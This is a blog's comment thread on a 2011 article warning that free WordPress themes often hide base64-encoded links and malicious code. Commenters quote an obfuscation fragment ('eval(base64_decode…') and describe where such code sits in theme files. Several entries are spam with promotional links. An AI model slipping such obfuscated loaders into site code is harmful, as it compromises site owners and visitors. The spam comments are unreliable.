Wordpress Development Company January 29, 2011 at 3:59 am
Pingback: 4 Reasons to Spring A Few Bucks For That Premium Wordpress Theme | 香港新媒體協會
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org | Eric Young Online
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | WPMU.org | Eric Young Online
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | WPMU.org | Eric Young Online
Pingback: Trust is key to avoiding a bad WordPress theme — NevilleHobson.com
Reply

Gil, Thanks for writing such an informative article. I am going to refer my peers and collegues to your post today. Well done!
Patti Collins

Patti Collins January 30, 2011 at 12:05 pm
- Reply
  
  Great information,when i saw the title,Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else,got curious and read the article,learned a lot.
  Thank you
  http://discounttools4sale.com
  
  Nasser Dibavand February 28, 2012 at 11:54 pm
Reply

Wow super article. top searches in google for a “wordpress themes” are really pain in the ass. Thats why i have prefered this site

J.Doe January 30, 2011 at 1:54 pm
Pingback: from Global Guerrillas: “Cell Phone Coordination of Open Source Protests” and Cyberculture roundup | Erkan's Field Diary
Reply

Siobhan
I came over to reply to a comment but replying is not so easy without threaded comments.

Is there any reason that you don’t use threaded comments?

Keith Davis January 30, 2011 at 2:22 pm
Pingback: Network Security Blog » Network Security Podcast, Episode 229
Pingback: How Social Media Changes Everything* | SeoDigerati.com
Pingback: Advantage for using Wordpress theme | jumistor.com
Pingback: Temas para WordPress podem ter código malicioso
Pingback: Wordpress Advice of the Month: Why Free Themes are EVIL
Pingback: Temas para WordPress podem ter código malicioso | Pipoco
Pingback: How Social Media Changes Everything* | Global SEO Solutions Blog
Pingback: >4 Reasons to Spring A Few Bucks For That Premium Wordpress Theme | technews
Pingback: Slain by the theme « Lavonardo
Pingback: How Social Media Changes Everything* « Designs By Brian
Reply

Hi, this article is awesome, i would like to know if you mind i make a translation (including all copyrights, of course :)) to publish in my blog… is that ok?
Thanks in advance for your answer!

alt February 1, 2011 at 2:14 am
Pingback: LunarNews – February 2011 | web-hosting-newsletter.com
Reply

@alt Sure, please do a translation. Can you let me know the link when it’s done? :)

Siobhan Ambrose February 1, 2011 at 5:13 pm
Pingback: Profrssional Wordpress website development | Websites for users to update and edit
Reply

Actually if you know a bit of coding you can inspect the theme yourself to find encrypted PHP code in the footer.php(mostly).
else you can use TAC (Theme Authenticity Checker) plugin.

Anoop February 2, 2011 at 10:47 pm
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | Eric Young Online
Pingback: Attention à la sécurité avec les templates Wordpress gratuits ! | Univers Network - Toute l’actualité sur le réseau et bien plus encore…
Reply

Eğer dişli yorum kullanmayan herhangi bir sebep var mı?

erdem February 4, 2011 at 6:53 pm
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | Eric Young Online
Pingback: Why You Should Never Search For Free WordPress Themes in Google | Eric Young Online
Reply

I’m glad I came across this, I did not know that about free word press themes, base64 is new to me, I will look for it from now on, I wanted to know, I have been having problem with themes since I upgraded my word press, do you know why? I can’t install any new one’s.

free google people search February 5, 2011 at 10:47 pm
Pingback: Genesis Theme Review « Wordpress for Websites
Pingback: Daveo Concept | Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche
Pingback: The Web Column: Issue No.4 — L'Alpiniste
Reply

amazing post Siobhan! You did a fantastic job. I guess you must have spent a lot of time bringing all this information together. I usually avoid freebies in general but at the first 2 months after I launched my blog I was using some free themes. Now I got Thesis. thanks again for your contribution.

steven papas February 9, 2011 at 2:37 pm
Pingback: Isn’t it time the WordPress foundation started protecting the trademark in domain names? I think yes… and here’s how we can help! | WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org
Reply

Very informative article, thank you sharing it. I never thought about that. Patrik

Patrik Krupar February 10, 2011 at 10:07 am
Pingback: Inside Trileaf Designs – Problems with “Free” Wordpress Themes « TriLeaf Designs
Pingback: SFCite | Blog | Isn’t it time the WordPress foundation started protecting the trademark in domain names? I think yes… and here’s how we can help!
Pingback: Temas para WordPress podem ter código malicioso | Variedades
Pingback: Shoestring Budget SEO Tips for Small Businesses | Aitir Google Lab
Pingback: Shoestring Budget SEO Tips for Small Businesses | Global SEO Solutions Blog
Pingback: Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else | WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org | [my] Comunicação
Pingback: Shoestring Budget SEO Tips for Small Businesses | Advertise Your Service
Pingback: Shoestring Budget SEO Tips for Small Businesses « Designs By Brian
Pingback: Shoestring Budget SEO Tips for Small Businesses | Search Engine Ads
Pingback: Shoestring Budget SEO Tips for Small Businesses | Click Through Rate
Pingback: Shoestring Budget SEO Tips for Small Businesses | Online Advertising Services
Pingback: The dangers of searching for free WordPress themes on Google
Pingback: Über die Sicherheit von WordPress-Themes und -Plugins @ techblog – Technologie für Menschen
Pingback: Avoid Themes That Have Evil Codes | Fazreen
Pingback: Premium WordPress Themes Are Not All The Same
Pingback: Kennt sich wer mit WordPress-Themes aus? - Delphi-PRAXiS
Reply

Hey thanks for this posts. I’m myself a beginner in blogging but these tips can be vital to me in doing my job well.

sandinfo February 16, 2011 at 6:14 am
- Reply
  
  Nice themes! If you want a bigger selection to choose from visit http://www.chrome-theme.org to grab all kinds of hd google backgrounds!
  
  Lia Piera March 12, 2012 at 5:09 pm
- Reply
  
  Nice themes! If you want a bigger selection to choose from visit http://www.chrome-theme.org to grab all kinds of hd google backgrounds!
  
  Gus Hardeux March 12, 2012 at 5:10 pm
Pingback: Quora
Reply

I came across this article from SeoBook. It’s a nice way to warn people to check the ‘free themes’ they download from internet. Of course, many will say: Why spend 80 bucks on a theme when I can find it for free ? Well, your post answered the question.
PS: I re-tweet your post and followed you on twitter :P

Victor February 18, 2011 at 3:31 am
Reply

Yeah, i have ran into this stuff before. I downloaded 1 free theme in my life and I never downloaded a free theme again after that.
My theme (like all of the above mentioned) had base 64 code in it for tons of backlinks and such. Also, like a few of the themes encountered above, I was warned not to remove the code or my site would not work. I know my way around html and basic php, and I figured this was not possible. Long story short, it completely disabled my site. You got a blank white page when you visited the site when the code was deleted. I restored the malicious code to my site and the site again worked. I also had so many problems with unsupported basic features and missing files that I spent so much time fixing it that I think I should have made one myself.

Stay away from these free templates. There are theme shops out there like http://www.themeforest.net that offer exceptional quality themes for $20-$30. Thats not too much to ask and supported ongoing with updates. Its the best way to go. Just look at that $20 as a cost of the blog like your hosting is $10 a month.

j. Alexander Curtis February 18, 2011 at 12:49 pm
Reply

Scary stuff. Thanks for the post.

Paul February 18, 2011 at 1:23 pm
Pingback: Strona | Belgron
Reply

Hello Siobhan Ambrose, I must say, “This is the most authoritative breakdown and expose of the FREE WP Theme issue that I’ve ever read!” I’m sending the link to my IM partner to see if he will write a response and post this to his Blog Help website. We’ve seen this discussion on the Warrior Forum and other IM forums and most bloggers just don’t get it until its too late. Thanks for taking the time to open our eyes!

Oh, and to repeat; if you are downloading these free WP Themes from anywhere but the actual WordPress website, you are BEGGING for a virus, malware or some other type of malicious script.

Blog Help February 18, 2011 at 2:12 pm
Reply

Great Info! Also please avoid downloading free revelotion lifestyle church theme. I found a hidden link with different characters leading to an adult sites but if you happen to download this theme check your folder wp-content/themes/church-40/ and look for the archive.php. There will be a message “<?php /* WARNING: This file is protected by copyright law. To reverse engineer or decode this file is strictly prohibited. */"– Just delete the code under it. You may also try the online outbound link tool. Just search google to see if you have hidden links to spam sites.

Auto Tuning Cars February 19, 2011 at 1:00 am
Pingback: Webbdesign-länktips – vecka 7 | Kim Göransson
Reply

Thank you so much for taking the time to write this amazing article! I have a friend who wants to convert her static website to WordPress and this article was the first thing I sent her in her quest to find the perfect theme.

You rock!

Linda W. February 19, 2011 at 1:52 pm
Reply

I recently created a post on 45 Free WordPress themes, the post was highlighted on reddit with a comment about TAC and a link to this page.

Whilst I sifted through your post (again thanks for highlighting TAC) I realised that I was potentially allowing people to download themes that may have some form of back links or indeed encrypted code.

So as a a result I went through the post and tested all 45 on my local install. I then posted the results on my blog underneath each theme to give readers insight into what they would be getting, to say the results were suprising would be an understatement.

The post can be viewed here http://fuzzly.co.uk/i-got-45-problems-but-a-wordpress-theme-aint-one/ you will note when viewing I have tried to be as transparent as possible about the dangers of each theme.

I wanted to thank you for taking the time to write up on WordPress Theme Authenticity as I believe it is massively overlooked.

Hopefully we will start a trend and all future WordPress theme collections will have this report in them, who knows maybe we have started a trend!

Ben February 20, 2011 at 5:57 am
Reply

What an eye opening article! I never realized there were “dirty” themes. My site’s been down for months and after reading this, I installed the site and theme on my local machine with the suggested plugins and lo and behold, base64 was there. Live and learn.

steph February 20, 2011 at 2:52 pm
Pingback: Never Search For Free WordPress Themes in Google or Anywhere Else ~ Ahmad Saiful Muhajir | another viewpoint
Reply

Thanks for the article.

I always do a code clean-up before installing a theme, it’s also fun to discover the techniques used by dumbasses to hide their crap :)

DrLightman February 22, 2011 at 4:15 am
Pingback: Too many hours, not enough time
Reply

I’m kinda in shock, why would anyone want to do this?

This is a really great post, I can see you’ve spent a lot of time on it.

Thank you

Linda Secrets February 22, 2011 at 12:15 pm
Pingback: Shoestring Budget SEO Tips for Small Businesses | Scottsdale Professional SEO Company
Pingback: How Social Media Changes Everything* | Scottsdale Professional SEO Company
Reply

Exploit Scanner is a fantastic plugin and I’ve used it to locate all the bad stuff in some of my free themes.You did a fantastic job on this, and I”m glad to see this post going viral. I had one site with a free theme that would play music out of the clear blue and redirect to some Chinese site at random. When I ran Exploit Scanner I found out why – full of bad stuff. Thanks for giving so many people a heads up on this.

Chuck Jines February 23, 2011 at 10:04 am
Pingback: Webmarketing pour poulpe » Blog Archive » Pas d’inspiration pour le netlinking ? Le poulpe et son neurone vont vous sauver !
Reply

Excellent post. I wish you write something about Wp scam plugins out there sometimes.

Thanks it was a good read.

sami February 26, 2011 at 12:25 am
Pingback: Aufgepasst bei Wordpress-Themes! « Drop the thought
Reply

Great post. Everyone needs to be aware of this. Thanks.

roy February 27, 2011 at 5:47 pm
Pingback: Watch Out For FREE Themes, You Could Be Getting More Than You Expected | WordPress Tips from Chuck Jines,Chicago SEO
Reply

Totally agree.

I’ve had several problems with themes with inappropriate links embedded in them.

Why saddle every page you will ever write with off-topic links…..

Better to find a stripped down free theme from WordPress and develop some child themes around it yourself.

Mark February 28, 2011 at 10:58 am
Pingback: Low Quality Google Search Results | Sphaerula
Reply

Thank you for a great post. Thankfully I have never used a free wordpress theme, and your great post has told me why! Many premium wordpress themes are very cheap, which still means its pretty cheap to get a decent website running with wordpress. A couple of premium providers that don’t cost the earth are ithemes.com, elegantthemes.com, and templatesold.com. I’ll probably run template authenticity check through a few of them though!

Dermot March 1, 2011 at 5:20 am
Reply

Hi Shiobhan,

Thanks for a brilliant article, whilst I am doing housekeeping on my blog after upgrading to WP3 this is another aspect to look into.

Two years online I have never even heard this being discussed anywhere else before! Keep up with the excellent topics.

Joan-BlogBizBuzz March 2, 2011 at 4:49 am
Pingback: Choosing a Wordpress theme: What your web site can look like-YourOnlineVisibility - YourOnlineVisibility
Pingback: Looking for wordpress theme for video game deals - The Wholesale Forums
Reply

SO true!

We built a WP themes search engine and we curate only the best quality WP themes, free and commercial as well: http://qualithemes.com/

Thx!

Catalin Zorzini March 8, 2011 at 9:40 am
Reply

Thank you so much for showing this fact..
really very helpful for beginners who always try to find themes from google etc..

thanks again !

rax March 8, 2011 at 10:03 am
Pingback: 10 WordPress Themes Ideal for Yoga Studios & Teachers
Pingback: Comment trouver des thèmes WordPress gratuits et premium - SuperThemes
Reply

You saved a lot of users with this article. You actually put a lot of work in each and every site. 8/10 (and the only good one is WordPress’ official site!, WOW) is scarry.

Nikulas March 9, 2011 at 7:50 am
Pingback: Shoestring Budget SEO Tips for Small Businesses
Pingback: Get Your New WordPress Blog Indexed In 24 Hours [checklist] | Search Engine People | Toronto
Reply

Thanks for article. Your site is very interesting

Dumbbells March 16, 2011 at 10:22 am
Pingback: Все еще ищете бесплатные темы для WordPress? | Сайт, форум, блог
Pingback: Technobyte » How Social Media Changes Everything*
Reply

Thanx for the warning. Usually I hunt for WP themes to install them onto Textpattern. Just HTML and CSS, nevertheless…

txpman March 19, 2011 at 4:58 am
Reply

Excellent analysis and quite an eye-opener! Thanx for all your hard work and the resources! I’ve already implemented some of them. You can never be too careful these days!

Linda March 19, 2011 at 6:25 am
Pingback: Niebezpieczny kod w szablonach | Witaj
Reply

You ca use Exploit Scanner to check the theme for bad stuff.

Free Wordpress Themes March 21, 2011 at 10:33 am
Reply

You can use the Exploit Scanner to check your theme.

Free Wordpress Themes March 21, 2011 at 10:35 am
Reply

Wow! I had no idea all those “free” content sites were so dangerous. I plan on reading a lot more of your articles. I kind of feel like the naive red riding hood talking to the wolf in the woods without a clue of his evil intentions. Talk about a wake up call. Thanks!

Heather Llanes March 22, 2011 at 8:11 am
Pingback: Themes and Plugins for Class Sites – ITCP Core 2 Spring 2011
Reply

super themes, thanks (like)!

Google reklama March 24, 2011 at 5:43 am
Reply

Congratulations Siobhan,
No doubts is a clever research and excellent article, thanks for sharing!

Otto Martin March 30, 2011 at 2:09 am
Reply

Hi,
I am completely new to this, just setting up my first website and you saved me from selecting a free theme as found on such dodgey sites! I am not a coding techy so I am very grateful for this information.

Thank you:)

Christine April 10, 2011 at 1:55 am
Pingback: White Hat SEO: It F@$#ing works | Affiliateswizard
Pingback: White Hat SEO: It F@$#ing works | NexGen SEM
Pingback: White Hat SEO: It F@$#ing Works | SEO Freelancer Hyderabad
Pingback: White Hat SEO: It F@$#ing Works | Visibility Revolution
Reply

Thanks for such a detailed, clear and well-researched post, Siobhan. I’m glad I use one of the Woo Themes on my site. I’ll check out your other sources for trusted themes, as well as the plugins you recommended. Sometimes my clients find themes on their own, and you’ve greatly improved my toolbox when it comes to checking them out.

Karilee April 11, 2011 at 5:40 am
Pingback: Cuidado com templates grátis de Wordpress. | Programador de Allstar!!!
Pingback: Segurança do Wordpress » Márcio Francisco Dutra e Campos -
Pingback: Why you should never search for a free WordPress theme
Pingback: White Hat SEO: It F@$#ing Works | SEO Basics
Pingback: Best host for Wordpress sites (security & performance) - SitePoint Forums
Reply

I always assumed that all free templates included links for SEO purposes. I’m ok with that. The real issue is that you open up other possible exploits with JS and who knows what else. Injecting links is one thing, but once someone figures out how to use these for spreading malware look out. What percentage of WP users use these themes, I would imagine it’s a large number.

john w April 12, 2011 at 10:12 am
Reply

Great post! There are definitely some nasty little buggers out there waiting to take advantage of the unlikely coder.

Kelly @ Alphabetix April 12, 2011 at 2:29 pm
Reply

Thank you so much for this .. of course I found it by typing in free wordpress themes but shall be looking elsewhere now. Great job.

Sally April 13, 2011 at 8:39 pm
Reply

Fantastic insight into these WP theme websites ranking at the top of Google, these should be penalised and bannished from the SERP’s purely for your findings alone.

Thanks for taking the time to write such a detailed article accompanied with code snippets and screenshots – will definitely be avoiding these sites for themes in future and will always ensure I check for this encrypted code/Base 64 in future.

Geoff Jackson April 14, 2011 at 12:40 pm
Pingback: Hi All, I have been hacked! - Niche Choppers VIP Earners Club
Reply

perfect article thanks for your work and sharing

Boby April 15, 2011 at 3:58 pm
Pingback: Why “free wordpress themes” are dangerous? |
Pingback: Warez Sites: The Phantom Menace - OddMag
Pingback: Warez Sites: The Phantom Menace - OddMag
Pingback: Straight to the Source: 100 Fresh and Free WordPress Themes | WordPress News at WPMU.org
Reply

Of course with the new panda updates the value of backlinking like this has been serious undermined anyway. Not taking anything away from the malicious nature of arbitrary code being injected into the theme of your site. It only takes one unscrupulous advertiser and before you know it you’re having your site infected with iframes-based malware popups and all sorts. Scary stuff. But hopefully, with diminishing returns now the alarm has been sounded…

Simon Brown April 19, 2011 at 7:26 pm
Pingback: SFCite | Blog | Straight to the Source: 100 Fresh and Free WordPress Themes
Pingback: Straight to the Source: 100 Fresh and Free WordPress Themes | Multidots Solutions
Pingback: Making the most out of your Wordpress blog | Acute New Media
Reply

I don’t know how much Google’s Panda helped.

Free wordpress themes search does now show wordpress.org at the top. I suppose that helps some.

But the second result is STILL wordpress themes base (#1 on this post), where I downloaded a random theme, looked in the footer and…
“<?php eval(base64_decode…"

So, they haven't cleaned up their act, and Google still has them as #2.

Kathy Kinsley April 22, 2011 at 6:55 am
Pingback: A Important Info About Your Wordpress Theme | Here I Am...
Pingback: An Important Info About Your Wordpress Theme | Here I Am...
Pingback: Friday Night Links: Easter Edition | Single Grain Blog
Reply

im a blogger for 2 years but never found such honest n mind blowing research. even my grand kids will remain thankful 2 u.
http://www.saabwagon.com/ is my non-frofit saab fan blog.

blogger April 22, 2011 at 11:08 pm
Pingback: The risks of FREE Software | For Mac & PC repair, you know where!
Reply

Thanks for all of your hardwork.

Excellent article

John April 24, 2011 at 10:14 am
Pingback: Startling Stories » Content Theft and Added Malware
Reply

Very nice sleuthing! Nothing in life is really free and sometimes we pay in ways that we hadn’t planned.

Rockdoc April 27, 2011 at 5:21 pm
Pingback: wpmag.com - WordPress News, Themes, Tutorials, Plugins, Questions, ...
Pingback: Por qué nunca deberías buscar "Free WordPress Themes" en Google [ENG]
Reply

I noticed a lot of hidden links in some free themes sometimes. What does it mean if you have the word “eval” in the code? I couldn’t work it out from the post, sorry.

lift web design April 28, 2011 at 6:29 am
Reply

Thanks for the tips, I have been using free templates for a while and didn’t know about the encoded links. I just checked my theme out, and sure enough, I have them on my site as well. Time to upgrade and buy a new template!

Wetlands April 28, 2011 at 10:14 am
Reply

Great, I never realized that they could use coded links…
Thanks for sharing

Bruno Rico April 28, 2011 at 6:58 pm
Reply

These are great WordPress resources – I actually just started digging into a really really solid book on WordPress 3.0. It’s got some really nice code samples, and is written by a few pro WordPress developers (including some from Envato). I’m actually giving away 2 copies of the e-book on my site – check out the details about the e-book and the giveaway here – I think you’ll dig it : http://bit.ly/lq20Ff

Jaki Levy May 5, 2011 at 5:21 am
Reply

There is clearly a lot to know about this. I think you made some very good factors in Functions also.
Keep working , wonderful position!

Gustavo Kuttner May 6, 2011 at 12:24 am
Pingback: 移除Magpress主题的footer链接看wordpress免费主题安全性 | ~SolagirL~
Pingback: Kosten (maatwerk) WordPress themes | Hiranthi's weblog - Weblog van een ondernemende vrouw
Pingback: Heu… vraiment? | Pimsland*2011
Reply

Thank you a lot for this very interesting post.
I’ll be more careful now with free theme.

tehwil May 10, 2011 at 9:31 pm
Pingback: Uma questão de temática | WP & etc
Pingback: Important Sites | SBH World Blog
Reply

It’s really a hard work done, I wan wanting to write such a informative article, about free themes, Thanks you did. I am goinf to link this article to mine post with intro. Keep it up…

Shekhar May 15, 2011 at 1:42 am
Reply

This is one of the helpful articles I’ve read, I never thought this could happen. Thanks.

me May 16, 2011 at 4:23 pm
Pingback: De pe Blogger pe Wordpress | Tătar Iulian
Reply

Yes you are right, most of the time beginner falls in this type of themes, they just want a good looking theme, does not consider this type of code or links or sometime does not bother what to look into a theme or what are the functionality offered by the theme.
Overall a well researched article for beginner. Those who knows a little bit of php and css can solve these little problems.

rakesh kumar May 18, 2011 at 1:03 am
Pingback: Genesis Framework WordPress Theme Review: Is It Good?
Reply

Great post. So many folks just install themes and hope for the best. it’s sad
that people put so much junk out there. I feel bad for those that get nailed by stuff like this.

Rosko May 20, 2011 at 11:35 pm
Pingback: A Free wordpress newsletter » From WordPress Beginner To Blogging Rockstar: 28 Awesome Tips
Pingback: How to Make Money with WordPress - Page 2
Pingback: Tips Tuesday and How to Design a Website
Reply

Very long and useful post, you spent lots of time doing this research and the result is amazing, thank you

Advisor Price October 18, 2011 at 2:43 pm
Reply

while I like your research, I have found one of your recommended sites theme hybrid to be suspect. I have downloaded themes from their that appear to have some serious problems. I am still doing my research but please review.

dimarkco October 18, 2011 at 10:10 pm
Pingback: How to use WordPress as a basic CMS | BLOGSPOT TEMPLATES
Pingback: How to use WordPress as a basic CMS | WORDPRESS PORTAL
Reply

Good to have discussions about the pros and cons of wordpress…once we know the complete picture it is better and easier to make the decision.It is a lovely guidance too for the beginners.

Web Development Los Angeles October 22, 2011 at 3:57 pm
Reply

I like your research, I have found one of your recommended sites theme hybrid to be suspect

rahul October 23, 2011 at 1:03 am
Pingback: Is your WP theme safe? - Webmaster Forum
Pingback: 101 Essential Free WordPress Resources for Building Your WordPress Website
Reply

Some excellent advice from Siohban Ambrose on how to check for hidden code within free wordpress themes found on google and other sites.

Web Design October 25, 2011 at 6:41 am
Pingback: Free Wordpress Themes - All Bad for SEO?
Reply

If my app/code/theme/script is so good… why do I have to lie/trick people into actually using it?

If it was THAT good… wouldn’t everyone WANT to use it?

Guest October 28, 2011 at 9:38 am
Reply

Thank you so much for this information. It is really nice to have people like you who can tell people like me who don’t know much about these things about what could happen.

Edith October 31, 2011 at 10:17 am
Pingback: Introducing Words for WP: A Copywriting Service for the WordPress Community
Pingback: Introducing Words for WP: A Copywriting Service for the WordPress Community | SNS Online
Pingback: Introducing Words for WP: A Copywriting Service for the WordPress Community | Vosoughi
Pingback: wp-coder.net » Introducing Words for WP: A Copywriting Service for the WordPress Community
Pingback: A Free wordpress newsletter » Introducing Words for WP: A Copywriting Service for the WordPress Community
Pingback: WordPress themes: free vs premium vs custom made - WOOpress
Pingback: Free WordPress Themes Often Contain Hidden Dangers | WDTalk
Pingback: 10 Reasons to Purchase the Premium WordPress Theme Headway Right NOW! | Gadarian Digital
Reply

I like your research, I have found one of your recommended sites theme hybrid to be suspect

freehostingdays November 3, 2011 at 3:32 am
Reply

My brother suggested I may like this blog. He was entirely right. This put up actually made my day. You can not consider just how so much time I had spent for this information! Thanks!

Bye for Now November 3, 2011 at 9:51 am
Pingback: Amoeba Solution Kiosk » Free WordPress themes and Malicious/Devil Codes
Pingback: WordPress Security Plugins 2011
Pingback: Legally Sell or Giveaway PREMIUM WordPress Themes - Comes with Over $1000 Worth of PREMIUM Themes | Domaining Diva
Pingback: Legally Sell or Giveaway PREMIUM WordPress Themes – Comes with Over $1000 Worth of PREMIUM Themes | BullFlip - Website Flipping
Reply

Good article. Need to be more careful with these themes now.

oj November 8, 2011 at 2:24 am
Reply

I am a newbie at wordpress, setting up wp websites for friends and family. Inasmuch as most of the sites I set up are on a budget, we use free wp themes on all of them. I was utterly aghast at your findings, and to think that I just click on those top serp sites and download the free themes assuming that their makers are cool honest guys.

Now, I have some tools to use to check these themes. The TAC tool however seems to have been un-updated since 2009.

James | Automatic Photo Scanner November 10, 2011 at 10:35 am
Reply

I have already came across several sites which does the same. In most of the cases, I avoid using those themes. Merely glancing at the footer.php gives you an idea how bad this themes could be. Avoid Avoid Avoid

Ricky November 14, 2011 at 1:28 am
Pingback: 10 Beautiful Premium WordPress Portfolio Themes | WPin.me
Pingback: testing | SRP Archives
Pingback: Cuidado Con Algunos Temas Wordpress
Reply

Wow, this is a scary article, but essential reading. I didn’t realise so many free theme sites were adding rogue code to their themes. I’ve just downloaded the Arras theme (minus Tim Thumb to avoid the vulnerability issue) and will give it a test run to see if it can replace some of the themes we’re using. Thanks for all the excellent information.

Geoff Rogers November 20, 2011 at 6:40 am
Pingback: Making the most out of your Wordpress blog – Your Social Media Ninja
Pingback: My Migration from Blogger to WordPress | Blog of Digilodger
Pingback: Why You Should Never Search For Free WordPress Themes in Google… » JackyFain.com
Reply

No matter how many times I come across your it never gets old. You definitely hit the tend of fashion and lastest style

Auto Accessories wholesale December 7, 2011 at 12:44 am
Pingback: Looking for a FREE WordPress theme? Be careful out there! | Bobwp
Pingback: 11 of WPMU’s Top WordPress Posts From 2011
Pingback: Why You Should Never Search For Free WordPress Themes in Google… | The Web Hen
Reply

Another theme that has malware on it is Groove Bordeaux. I downloaded it because I liked the look but when I did I ended up with my sites being hacked. I was able to go through the code and clean it up.. but definitely one to stay away from too.
Cheers
John

John December 7, 2011 at 6:20 pm
Reply

Great work Siobhan. I don’t know if this was pointed out by your other commenters, but the globalEval code caught by Exploit Scanner is likely just a bit of harmless jquery. Not sure why Exploit Scanner is chucking a wobbly over that, it’s found in every installation of wordpress that uses jquery. You can see the exact same verbiage yourself by doing a test search of any local or server copy of jquery.js

Thanks for turning us on to some great tools, too!

Gary Darling December 7, 2011 at 8:00 pm
Reply

Well,OK.I have to say,what a wonderfulit is.thank you for your sharing so good in the website.I like it very much.

Auto Accessories wholesale December 8, 2011 at 12:27 am
Reply

This post really goes the extra mile when delivering what people need to hear. Thank you for posting this :)

Dean December 8, 2011 at 1:58 am
Reply

hiii… I read the post and like it very much also it was very helpful.. but tell me what is ‘TAC’ is it a plugin???
then from where can i get it??
please reply!

Agnel Waghela December 8, 2011 at 2:55 am
Pingback: There is no such thing as a free….. | ZOAH
Reply

Thank you for posting this.
Have about this site? Is it safe? http://fthemes.com/

Izzy December 12, 2011 at 3:06 pm
Pingback: Good content trumps SEO… I beg to differ, try putting...
Pingback: Good content trumps SEO… I beg to differ, try putting WordPress in your domain name! | Vosoughi
Pingback: wp-coder.net » Good content trumps SEO… I beg to differ, try putting WordPress in your domain name!
Pingback: Good content trumps SEO… I beg to differ, try putting WordPress in your domain name! | SNS Online
Pingback: A Free wordpress newsletter » Good content trumps SEO… I beg to differ, try putting WordPress in your domain name!
Pingback: Hacked Wordpress Sites
Pingback: How Safe Are Free Wordpress Themes | Trish Mullen | Integrating Personal Development with Internet Marketing
Reply

Great work Siobhan, i am happy i found this post. i tweeted and i follow u. i am a newbie,just a month old. the other day,when i analysed my site with a tool i found some links, with which i was not familiar. i was suspecting some thing, but i could not find where from they were coming.now i know.thanks,great info.

@dr_yeast December 16, 2011 at 8:02 am
Reply

Hello There. I found your weblog the usage of msn. That is an extremely well written article. I?ll be sure to bookmark it and return to read extra of your helpful info. Thank you for the post. I?ll certainly comeback.

tech news December 20, 2011 at 6:00 am
Pingback: Install WordPress Theme | How to Install WordPress Theme in Three Steps!
Reply

Thanks for taking out the time to inform. Very useful article, but a bit scary, too!

AC Gold mine December 22, 2011 at 7:35 am
Reply

I good god My boss make me use “Gameliso” and the site is live what should I do…..

Jermaine December 23, 2011 at 3:28 pm
Reply

Thanks , I’ve just been searching for information about this subject for a while and yours is the greatest I have discovered so far. However, what concerning the conclusion? Are you positive concerning the supply?|What i do not realize is in fact how you are not actually a lot more neatly-appreciated than you might be right now. You are very intelligent.

mixtape December 24, 2011 at 1:15 am
Reply

Great post, very informative. I ponder why the opposite specialists of this sector don’t realize this. You should continue your writing. I am confident, you’ve a great readers’ base already!|What’s Taking place i’m new to this, I stumbled upon this I have discovered It positively helpful and it has helped me out loads. I hope to contribute & help other customers like its helped me. Great job.

ipad scam December 24, 2011 at 10:03 am
Reply

Heya i’m for the primary time here. I came across this board and I find It really useful & it helped me out a lot. I’m hoping to offer one thing again and aid others such as you aided me.

seo mentor December 26, 2011 at 4:02 pm
Reply

I’d like to point out that generally I would agree with the sentiment of your article in regards to free WP Themes (I hate encrypted ones). That is why we devoted our site to the best in free wp themes (non-encrypted). Check it out if you have the time. It will be worth it!!

Patricia December 28, 2011 at 6:20 pm
Reply

Themes with encrypted code usually have all kind of fancy features, slider, outstanding design etc. This code simply is meant to have those commercial links not removed. Agreed, themes have to be thoroughly checked before going to your server.
On the other side if you buy a premium theme, things are also complex. Many premium themes load awfully slow. Constant wordpress updates require to also have your theme upgraded, but who guarantees? Premium themes are rarely tested on all different types of servers, surelly a risk factor. Many wordpress users meanwhile have thousands of articles/comments. To buy a premium theme and then to find out that your pics of all your 5000 posts are not activated as featured image with proper size and therefore dont show up in the newly bought premium theme is another obstacle. So yes, agreed, temptation to carelessly try out “free themes” is there.

Lenny21 December 29, 2011 at 12:07 pm
Pingback: free wordpress article directory theme - Autoblogging in Action
Reply

Very informative blog. I haven’t used WordPress yet but I was very keen on learning about it. I always search on Google and it scared me upon learning that these top search engines might contain malware. Thank you for sharing, most specially guiding us where to find free WordPress themes which is safe. Brilliant post!

Erika January 3, 2012 at 2:11 am
Reply

Excellent items from you, man. I’ve remember your stuff previous to and you are simply extremely great. I really like what you have bought right here, certainly like what you are saying and the way through which you are saying it. You are making it entertaining and you continue to take care of to stay it smart. I can’t wait to read much more from you. That is actually a tremendous website.

SmithwaySecurity January 4, 2012 at 3:22 am
Pingback: Wordpress News - Why WordPress?Wordpress News
Pingback: Why FREE themes aren't always good | WP for Biz
Reply

Thank you for giving me information where to find WordPress without being scared I might stumble on malware. I’m just so glad I came across this blog, very helpful really. I always depend on google for years, so surprised of these top search engines containing malware. Tnaks again!

Erika January 7, 2012 at 4:39 am
Reply

Thank you for giving me information where to find WordPress without being scared I might stumble on malware. I’m just so glad I came across this blog, very helpful really. I always depend on google for years, so surprised of these top search engines containing malware. Thanks again!

Erika January 7, 2012 at 4:49 am
Reply

It’s actually a great and helpful piece of info. I am satisfied that you simply shared this useful information with us. Please keep us informed like this. Thank you for sharing.

Киев - СТО - Вишневое. СТО Киев. Станция техобслуживания. January 8, 2012 at 12:57 am
Reply

Thank you for giving me information,It’s actually a great and helpful piece of info.

biker jewelry January 10, 2012 at 11:31 pm
Reply

My brother recommended I would possibly like this website. He was entirely right. This submit truly made my day. You cann’t believe just how much time I had spent for this info! Thank you!

make money with google, how to make money with google, making money with google,google money,make money google ,best way to make money,ways to earn money,easy way to make money,how to make more money,quick ways to make money,ways to make money fast,make o January 15, 2012 at 2:44 pm
Pingback: Il ne faut jamais chercher un thème WordPress gratuit sur un moteur de recherche | WordPress Francophone | ZeeWebON
Reply

Scary to know about this, especially with content you trust and then bad happens. You awaken my eyes. Keep up good work

video production san francisco January 17, 2012 at 1:56 am
Pingback: VTCTA WordPress 101 | VTCTA
Reply

It is in reality a nice and useful piece of information. I am happy that you just shared this useful information with us. Please stay us up to date like this. Thanks for sharing.

what is google sniper January 21, 2012 at 4:37 pm
